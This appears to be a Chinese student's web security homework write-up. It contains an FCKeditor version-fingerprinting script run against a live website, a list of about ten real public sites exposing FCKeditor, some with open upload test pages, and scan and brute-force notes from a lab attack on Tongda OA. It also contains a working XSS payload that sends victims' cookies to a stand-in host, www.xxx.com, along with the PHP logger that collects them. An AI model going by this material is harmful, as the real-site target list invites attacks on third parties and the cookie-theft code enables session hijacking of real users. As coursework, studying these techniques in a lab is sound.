Web3 作业
一、写一个脚本判断fck的版本
思路:找到“version”字段,向下取30个字符,其中规则匹配1.2?? 1.2.3? 1.2.3.4? 这样的。输出。
Python脚本:
import os
import re
import requests
def check(url):
headers={
'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
}
res = requests.get(url)
return res.text
def getans(aim):
pattern = re.compile(r'((\d.){2,4})')
res = pattern.findall(aim)
print('the version code is : ')
print(res[0][0][0:-1])
def main():
print('this message is from main function')
res = check('http://www.yunusemre.net/trpanel/fckeditor/editor/dialog/fck_about.html')
#print(len(res))
firstposition = res.find('version')
endposition = firstposition + 100
aim = res[firstposition:endposition]
# print(aim)
getans (aim)
if __name__ == '__main__':
main()二、搜索至少10个fck的目标
这个简单,直接在fofa中,header:”/fckeditor/editor/dialog/fck_about.html”
或者直接googlehacking: inurl:“/fckeditor/editor/dialog/fck_about.html”
目标如下:
http://voies-hydrauliques.wallonie.be/opencms/resources/editors/fckeditor/editor/dialog/fck_about.html???????? 2.3.2
https://fossies.org/linux/egs/src/fckeditor/editor/dialog/fck_about.html?????? 2.2
https://maybank-uum.angelfire.com/fckeditor/editor/dialog/fck_about.html???? 2.4.2
https://pokeyplay.com/libreria/fckeditor/editor/dialog/fck_about.html???????? 2.4.2
https://theanswerline.com/FCKeditor/editor/dialog/fck_about.html???????? 2.0?
https://www.sun913.cn/m/?manage/FCKeditor/editor/dialog/fck_about.html 2.3
http://www.dnlautos.com/__web/__index/scripts/fckeditor/editor/dialog/fck_about.html
https://www.codeproject.com/Articles/157836/Efficient-Usage-Of-FckEditor
https://svn.ckeditor.com/FCKeditor/tags/1.6.1/_docs/whatsnew.html
http://www.yunusemre.net/trpanel/fckeditor/editor/dialog/fck_about.html?? 2.6.4.1
有上传的目标如下:
https://maybank-uum.angelfire.com/fckeditor/editor/filemanager/upload/test.html
https://pokeyplay.com/libreria/fckeditor/editor/filemanager/upload/test.html.tmpfix
https://theanswerline.com/FCKeditor/editor/filemanager/upload/test.html?? (这个会重定向)
http://www.yunusemre.net/trpanel/fckeditor/editor/filemanager/connectors/uploadtest.html
三、攻击通达OA(靶机环境学习)
扫描172.16.6.10 发现开了80
135/tcp?? open? msrpc???????? Microsoft Windows RPC
139/tcp?? open? netbios-ssn?? Microsoft Windows netbios-ssn??? 考虑ipc
445/tcp?? open? microsoft-ds????? 考虑ms17-010
1188/tcp? open? hp-webadmin?
3336/tcp? open? mysql???????? MySQL (unauthorized)?? 不允许连接
5040/tcp? open? unknown
5357/tcp ?open? http????????? Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
7680/tcp? open? pando-pub?
做了保护,永恒之蓝打不下来,估计是smb认证。
[21:21:31] Starting:
[21:21:35] 400 -? 166B? - /Trace.axd::$DATA???????????????????????????????????????????????
[21:21:35] 301 -? 178B? - /WebService? ->? http://172.16.6.10/WebService/?
[21:21:35] 400 -? 166B? - /\..\..\..\..\..\..\..\..\..\etc\passwd??????????????????????
[21:21:37] 301 -? 178B? - /api? ->? http://172.16.6.10/api/
[21:21:37] 403 -? 564B? - /api/??????????
[21:21:38] 403 -? 564B? - /attachment.banner.txt?????????????
[21:21:38] 403 -? 564B? - /attachmentedit.banner.txt
[21:21:38] 403 -? 564B? - /attachments
[21:21:38] 403 -? 564B? - /attachments.banner.txt
[21:21:40] 200 -? 894B? - /favicon.ico?????????????????????????????????????????????????????????????
[21:21:41] 301 -? 178B? - /general? ->? http://172.16.6.10/general/???????????????????????? ??????????
[21:21:41] 403 -? 564B? - /images/????????????????????????????????
[21:21:41] 403 -? 564B? - /images/c99.php
[21:21:41] 301 -? 178B? - /images? ->? http://172.16.6.10/images/
[21:21:41] 403 -? 564B? - /images/Sym.php
[21:21:41] 301 -? 178B? - /inc? ->? http://172.16.6.10/inc/
[21:21:41] 403 -? 564B? - /inc/
[21:21:41] 200 -?? 10KB - /index.php??????????????????????????????????????????????????????????
[21:21:43] 301 -? 178B? - /mobile? ->? http://172.16.6.10/mobile/????????????????????
[21:21:44] 301 -? 178B? - /portal? ->? http://172.16.6.10/portal/
[21:21:45] 200 -?? 26B? - /robots.txt?????????????????????????????????????
[21:21:45] 500 -? 537B? - /servlet/%C0%AE%C0%AE%C0%AF???????????????????????????????????????????
[21:21:45] 301 -? 178B? - /share? ->? http://172.16.6.10/share/??????????????????????????????????
[21:21:45] 200 -??? 0B? - /share/???????????????????????????????????????????????????????????????????
[21:21:45] 200 -??? 2KB - /portal/???????????????????????????????????????????? ???????????????????
[21:21:46] 301 -? 178B? - /static..? ->? http://172.16.6.10/static/
[21:21:46] 301 -? 178B? - /static? ->? http://172.16.6.10/static/
[21:21:46] 403 -? 564B? - /templates/beez/index.php???????????????????????????????????????????????
[21:21:46] 403 -? 564B? - /templates/ja-helio-farsi/index.php
[21:21:46] 403 -? 564B? - /templates/rhuk_milkyway/index.php
[21:21:47] 400 -? 166B? - /web.config::$DATA????
因为smb认证,所以ipc之类的进程间通信rpc攻击也就不尝试了,优先使用爆破,但是居然!!错误3次等待10分钟!就离谱,这个时候我想起来了shrio反序列化的猜解顺序,但是没用,因为这个是硬错误。
之后神奇地,admin 直接空密码就进去了后台。
版本11.4,直接google查询,发现一堆复现方法getshell。借鉴大佬文章https://cloud.tencent.com/developer/article/1700165。。?
3.1通达OA的漏洞总结
11.4 未授权
11.5和之下的sql注入
有一个问题,就是状态码500,但是依旧可以测试出盲注,这是为何??然后sqlmap跑不出来。。。在管理界面一直晃悠,发现可能是nosql。
参考github大佬的工具,我两种方法传了2个码,但是都没有执行权限,无法连接webshell getshell
https://github.com/admintony/TongdaRCE
https://github.com/jas502n/OA-tongda-RCE
到这里为止我基本放弃了。
四、实现一次xss攻击
还是倒霉的之前web作业2的网站,但是,awvs扫了没有xss。所以本地dvwa
<script>document.location='http://www.xxx.com/cookie.php?cookie='+document.cookie;</script>
网址可以是本地多站点虚拟化的网址,这里为了方便直接127.0.0.1??
在www网址下放置2个文件,一个cookie.txt 另一个cookie.php cookie.php里面写着:
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
Fwrite($log,$cookie."/n");
Fclose($log);
?>
结合起来看意思就是当受害者访问这个xss网页的时候,重定位到www.xxx.com/cookie.php网址下,把他的cookie作为参数传入,写入cookie.txt中。
然后攻击者拿到这个cookie,就模拟受害者登录。
五、渗透脑图
改了知乎蓝色大佬的xmind,加了指纹信息